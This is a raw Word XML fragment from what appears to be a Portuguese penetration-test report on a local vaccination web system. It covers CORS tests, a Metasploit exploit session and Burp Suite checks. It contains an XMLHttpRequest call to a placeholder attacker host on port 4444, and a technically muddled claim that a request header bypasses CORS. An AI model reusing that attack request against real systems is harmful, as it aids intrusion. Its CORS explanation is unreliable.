          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00E77F75" w:rsidRDefault="00E77F75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E77F75" w:rsidRDefault="00E77F75" w:rsidP="008C6DC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="6496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8719F1" w:rsidRDefault="009A2041" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 32</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:t xml:space="preserve">Console do navegador indicando a </w:t>
      </w:r>
      <w:r w:rsidR="00751591">
        <w:t>depreciação</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:t xml:space="preserve"> do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>“withCredencials”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="00751591" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pP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FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008719F1" w:rsidP="008C6DC7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Para burlar o filtro CORS, deve ser adicionado ao cabeçalho da requisição uma instrução que simule uma assinatura válida para o navegador. Para esse fim, foi utilizado a instrução “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">setRequestHeader” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF400C" w:rsidRDefault="00881DA5" w:rsidP="008C6DC7">
      <w:pPr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ódigo abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona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Pr="003E1ACB" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
      </w:pP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r = </w:t>
      </w:r>
      <w:r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new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 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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</w:rPr>
        <w:t>XMLHttpRequest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 xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
      </w:pP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r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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</w:rPr>
        <w:t>"GET"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,’</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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</w:rPr>
        <w:t>http://IP_do_servidor:4444’,false</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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setRequestHeader(“</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE"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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin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”,”*”)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lastRenderedPageBreak/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send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8C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7"/>
    <w:p w:rsidR="00B04AF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0F06E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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 xml:space="preserve">O sistema </w:t>
      </w:r>
      <w:r w:rsidR="00881DA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">não </w:t>
      </w:r>
      <w:r w:rsidR="00D76012">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">.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>sucedida e o Metasploit conseguiu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> iniciar o exploit.</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="000F06E4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ravés desse exploit, uma conexão entre máquina atacada e o sistema atacante é aberta podendo haver graves consequências como: Escalada de privilégios na máquina atacada e criação de backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00FF400C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spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75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19945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F400C" w:rsidRDefault="009A2041" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 33</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00E77F75"/>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75"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3600450" cy="13239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751591">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 34</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008719F1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploit inciado com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00751591" w:rsidRDefault="000F06E4" w:rsidP="00751591">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24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Pr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mapeamento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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Utilizar o Burp Suite para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar um relatório dos dados cadastrados no sistema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Default="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="003E38DF" w:rsidRDefault="00E77F75" w:rsidP="00E77F75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6400991" cy="4457511"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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689" cy="44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871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35</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="008719F1" w:rsidRDefault="00751591" w:rsidP="008719F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pP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Burp Suite, a página não recebe nenhum parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pois todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3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Quando </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregados para filtrar os dados </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>que serão exibidos no relatório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  <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Mediante a esse contexto, não </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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751591" w:rsidRPr="00015DE3" w:rsidRDefault="00751591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8C6DC7" w:rsidRPr="008719F1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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="00751591">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar uma impressão para um relatório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Default="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00015DE3" w:rsidRDefault="00E77F75" w:rsidP="008C6D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273240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>Figura 36- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00015DE3" w:rsidRDefault="00751591" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008C6DC7" w:rsidP="008719F1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a mesma maneira que </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>foi detectado na tela Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, a ferramenta indica que a tela </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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8719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>não foram encontradas vulnerabilidades que pudessem ser exploradas.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6A578B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3">
        <w:r w:rsidR="008C6DC7"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4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5"/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6" w:history="1">
        <w:r w:rsidR="008C6DC7"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7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48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9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0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 - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink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1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2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6A578B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3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/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9F" w:rsidRDefault="00CE679F" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CE679F" w:rsidRDefault="00CE679F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9F" w:rsidRDefault="00CE679F" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CE679F" w:rsidRDefault="00CE679F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15DE3"/>
    <w:rsid w:val="00022ED2"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="000E6FA1"/>
    <w:rsid w:val="000F06E4"/>
    <w:rsid w:val="00101063"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="001609AB"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00174B27"/>
    <w:rsid w:val="00190AAD"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="001968AD"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="001A5B8E"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001C4F4D"/>
    <w:rsid w:val="001C7028"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="002151B5"/>
    <w:rsid w:val="00224FD8"/>
    <w:rsid w:val="00236FDF"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="0029632F"/>
    <w:rsid w:val="002A0DD8"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="003164B7"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="00337476"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003A5422"/>
    <w:rsid w:val="003D0913"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003E1ACB"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="00456110"/>
    <w:rsid w:val="0048383A"/>
    <w:rsid w:val="0049317F"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004C783E"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004E2307"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="00503644"/>
    <w:rsid w:val="00517685"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00537F7B"/>
    <w:rsid w:val="00544368"/>
    <w:rsid w:val="00557D26"/>
    <w:rsid w:val="00564674"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005A5292"/>
    <w:rsid w:val="005A68AB"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005D6A2A"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="006071F5"/>
    <w:rsid w:val="00626AC7"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="006473CA"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="00654CAB"/>
    <w:rsid w:val="00654DEF"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006A578B"/>
    <w:rsid w:val="006C08DA"/>
    <w:rsid w:val="006C2DFF"/>
    <w:rsid w:val="006C31F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36DBC"/>
    <w:rsid w:val="0074275B"/>
    <w:rsid w:val="00751591"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00807BFC"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00846A20"/>
    <w:rsid w:val="0084777A"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="00870818"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="00881DA5"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A79EE"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="008D0530"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00944F31"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="009A2041"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A83EB9"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00A966EC"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00B04AF1"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B560B0"/>
    <w:rsid w:val="00B71318"/>
    <w:rsid w:val="00B71A0F"/>
    <w:rsid w:val="00B800D4"/>
    <w:rsid w:val="00B846D4"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00B959F5"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1742"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C12C3D"/>
    <w:rsid w:val="00C32280"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C36925"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C624EB"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00C97F3F"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00CE679F"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D46C6B"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D602EF"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D65D65"/>
    <w:rsid w:val="00D76012"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00D975CE"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00DF0646"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E77F75"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00E9423C"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EC2366"/>
    <w:rsid w:val="00EC5D2B"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F04EFF"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F52870"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00F935DA"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FE6FEB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F5552-F867-4060-B657-D4D9DBD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hyperlink" Target="http://192.168.0.58/vacina/login.php?logado=false" TargetMode="External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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBIOS" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3.org/TR/cor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hyperlink" Target="https://pt.wikipedia.org/wiki/Network_Time_Protoc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yperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/cd/B28359_01/appdev.111/b28370/commen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software.dzhuvinov.com/cors-filter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s://hackertarget.com/sqlmap-post-request-injection/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/ms188621(v=sql.10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www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Simple_Network_Management_Protoco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ev.mysql.com/doc/refman/5.7/en/comment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C360-F316-4F2B-875F-035008FC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51</Pages>
  <Words>7473</Words>
  <Characters>40355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Diego</cp:lastModifiedBy>
  <cp:revision>185</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-25T02:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-12T17:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>